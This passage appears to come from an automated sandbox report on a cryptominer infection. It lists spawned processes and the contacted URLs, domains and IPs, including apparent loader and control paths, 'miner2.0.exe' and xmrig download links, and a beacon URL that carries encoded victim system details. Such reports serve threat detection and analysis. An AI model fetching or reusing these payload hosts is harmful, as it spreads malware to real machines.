C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\choice.exe
|
choice /C Y /N /D Y /T 3
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 193 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://185.215.113.16/Jo89Ku7d/index.phpncodede
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpER
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncodedr
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpN7
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php/dn
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpr7f
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php=
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpdedA
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpnu
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php&7:
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php4
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php/
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncoded
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpm
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php:7.
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/conf1.php
|
172.67.187.100
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncoded&
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncoded3
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncoded4
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpF6Z
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpWindows
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.php
|
185.215.113.16
|
||
https://eijfrhegrtbrfcd.online/
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpB7V
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpM6
|
unknown
|
||
http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
|
unknown
|
||
https://eijfrhegrtbrfcd.online/R
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
|
unknown
|
||
https://github.com
|
unknown
|
||
http://185.215.113.16/W
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
|
unknown
|
||
http://185.215.113.16/inc/loader_5879465914.exe%
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/conf1.phpe
|
unknown
|
||
https://eijfrhegrtbrfcd.online/A
|
unknown
|
||
http://185.215.113.16/ViewSizePreferences.SourceAumid2
|
unknown
|
||
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
|
unknown
|
||
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
|
unknown
|
||
http://github.com
|
unknown
|
||
http://www.w3.
|
unknown
|
||
https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
|
unknown
|
||
https://eijfrhegrtbrfcd.online/0
|
unknown
|
||
https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig
|
unknown
|
||
http://185.215.113.16/inc/loader_5879465914.exeh
|
unknown
|
||
http://185.215.113.16/t
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://185.215.113.16/Local
|
unknown
|
||
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0=
|
172.67.187.100
|
||
http://185.215.113.16/15.113.16/
|
unknown
|
||
http://185.215.113.16/inc/loader_5879465914.exe
|
unknown
|
||
http://185.215.113.16/15.113.16/System32
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/miner2.0.exe
|
172.67.187.100
|
||
http://185.215.113.16/
|
unknown
|
||
http://185.215.113.16/ysWOW64
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/conf1.phpy
|
unknown
|
||
https://sanctam.net:58899
|
unknown
|
||
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
|
140.82.121.3
|
||
http://185.215.113.16/Wiow
|
unknown
|
||
http://185.215.113.16/ones
|
unknown
|
||
http://185.215.113.16/4
|
unknown
|
||
https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
|
unknown
|
||
http://185.215.113.16/7737D9ECF5C72AA370644
|
unknown
|
||
https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
|
unknown
|
There are 54 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
eijfrhegrtbrfcd.online
|
172.67.187.100
|
||
github.com
|
140.82.121.3
|
||
sanctam.net
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.67.187.100
|
eijfrhegrtbrfcd.online
|
United States
|
||
185.215.113.16
|
unknown
|
Portugal
|
||
140.82.121.3
|
github.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
48C0000
|
direct allocation
|
page read and write
|
||
4CD0000
|
direct allocation
|
page read and write
|
||
961000
|
unkown
|
page execute and read and write
|
||
5340000
|
direct allocation
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
C21000
|
unkown
|
page execute and read and write
|
||
345A000
|
trusted library allocation
|
page read and write
|
||
12000
|
unkown
|
page readonly
|
||
340A000
|
trusted library allocation
|
page read and write
|
||
C21000
|
unkown
|
page execute and read and write
|
||
C21000
|
unkown
|
page execute and read and write
|
||
1BAAD000
|
stack
|
page read and write
|
||
CF0000
|
heap
|
page execute and read and write
|
||
3743000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
41FE000
|
stack
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
BAB000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
15952CA0000
|
heap
|
page read and write
|
||
1E9BD000
|
stack
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
37DC000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
789000
|
heap
|
page read and write
|
||
4DA6000
|
heap
|
page read and write
|
||
DC5A3BC000
|
stack
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
B7D000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
5550000
|
direct allocation
|
page execute and read and write
|
||
4DBE000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
31FF000
|
stack
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
146E000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
3759000
|
heap
|
page read and write
|
||
1D8AE000
|
stack
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
DBB000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
6A0000
|
direct allocation
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
45AF000
|
stack
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
3120000
|
direct allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
24911420000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
37C0000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
D15000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
2EFF000
|
stack
|
page read and write
|
||
7D2000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
3797000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
F1B000
|
unkown
|
page execute and read and write
|
||
7CB000
|
heap
|
page read and write
|
||
D75000
|
heap
|
page read and write
|
||
3616000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
2F3E000
|
stack
|
page read and write
|
||
4EC0000
|
direct allocation
|
page execute and read and write
|
||
7B0000
|
heap
|
page read and write
|
||
375F000
|
heap
|
page read and write
|
||
4A40000
|
direct allocation
|
page execute and read and write
|
||
37C0000
|
heap
|
page read and write
|
||
4B3E000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
26CC28D5000
|
heap
|
page read and write
|
||
500B000
|
stack
|
page read and write
|
||
14B5000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
7BB000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
C20000
|
unkown
|
page readonly
|
||
37B2000
|
heap
|
page read and write
|
||
28FE000
|
stack
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
1DDAE000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
2EC0000
|
trusted library allocation
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
12BB000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
E75000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
AD5000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
138B3000
|
trusted library allocation
|
page read and write
|
||
22000
|
unkown
|
page readonly
|
||
37C4000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page execute and read and write
|
||
37B1000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4C10000
|
direct allocation
|
page execute and read and write
|
||
379B000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
1E4B0000
|
heap
|
page read and write
|
||
1DFDEFBD000
|
heap
|
page read and write
|
||
1E4E4000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
31B0000
|
heap
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4B01000
|
direct allocation
|
page read and write
|
||
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
10C0000
|
unkown
|
page execute and read and write
|
||
4841000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
EE8000
|
unkown
|
page execute and read and write
|
||
7B0000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7C4000
|
heap
|
page read and write
|
||
3764000
|
heap
|
page read and write
|
||
D2A000
|
heap
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
343D000
|
stack
|
page read and write
|
||
1305000
|
heap
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
BDC000
|
stack
|
page read and write
|
||
2AAE000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
8E3000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
37A7000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
C6B000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
373D000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4D1C000
|
stack
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
1F0000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
3751000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
1C000
|
unkown
|
page readonly
|
||
37A3000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
9A1000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
3FFE000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
58A1AFF000
|
stack
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
2D6E2950000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
80000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
37B6000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
7FDE000
|
stack
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
133C1000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
132A7000
|
trusted library allocation
|
page read and write
|
||
26CC2550000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
4E30000
|
direct allocation
|
page execute and read and write
|
||
1E554000
|
heap
|
page read and write
|
||
2CFF000
|
stack
|
page read and write
|
||
212B5406000
|
heap
|
page read and write
|
||
66C000
|
stack
|
page read and write
|
||
48BE000
|
stack
|
page read and write
|
||
2D6E2A40000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
C54000
|
unkown
|
page execute and read and write
|
||
393E000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
57C000
|
stack
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
3510000
|
trusted library allocation
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
30BF000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
A0C000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
1D07D000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
1DFDEF20000
|
remote allocation
|
page read and write
|
||
3784000
|
heap
|
page read and write
|
||
12EF000
|
stack
|
page read and write
|
||
359B000
|
trusted library allocation
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
BDE000
|
stack
|
page read and write
|
||
3E6E000
|
stack
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
33C1000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
3744000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
183F000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
BBD000
|
heap
|
page read and write
|
||
40B000
|
unkown
|
page read and write
|
||
F2A000
|
unkown
|
page execute and write copy
|
||
4611000
|
heap
|
page read and write
|
||
3798000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
1BFE0000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
2491146C000
|
heap
|
page read and write
|
||
6A01000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
26CC28E0000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
357C000
|
trusted library allocation
|
page read and write
|
||
66C000
|
stack
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3120000
|
direct allocation
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
2B67000
|
heap
|
page read and write
|
||
3120000
|
direct allocation
|
page read and write
|
||
28EE000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
379B000
|
heap
|
page read and write
|
||
3759000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
7FFD9B9CD000
|
trusted library allocation
|
page execute and read and write
|
||
87A000
|
heap
|
page read and write
|
||
437F000
|
stack
|
page read and write
|
||
38E7000
|
trusted library allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
1D15E000
|
stack
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
37A1000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
10C0000
|
unkown
|
page execute and read and write
|
||
A9B000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
990000
|
heap
|
page execute and read and write
|
||
3738000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
1E0AE000
|
stack
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
7C5000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
2F7F000
|
stack
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
377A000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
2491147C000
|
heap
|
page read and write
|
||
875000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
E11000
|
unkown
|
page execute and read and write
|
||
26CC2650000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7FFD9B9CB000
|
trusted library allocation
|
page execute and read and write
|
||
3500000
|
trusted library allocation
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3754000
|
heap
|
page read and write
|
||
2E7E000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
F2A000
|
unkown
|
page execute and write copy
|
||
4620000
|
heap
|
page read and write
|
||
6D6000
|
heap
|
page read and write
|
||
1D68E000
|
stack
|
page read and write
|
||
1905000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
B08000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
762000
|
heap
|
page read and write
|
||
1025000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
752000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
7CC000
|
heap
|
page read and write
|
||
38E5000
|
trusted library allocation
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
70A000
|
heap
|
page read and write
|
||
4C3F000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
323F000
|
stack
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
B5C000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
54D0000
|
direct allocation
|
page execute and read and write
|
||
212B542F000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
6BE000
|
heap
|
page read and write
|
||
E2E000
|
stack
|
page read and write
|
||
337E000
|
stack
|
page read and write
|
||
4E40000
|
direct allocation
|
page execute and read and write
|
||
3797000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
2AFE000
|
stack
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
32D9000
|
trusted library allocation
|
page read and write
|
||
10BE000
|
unkown
|
page execute and read and write
|
||
B10000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
3751000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
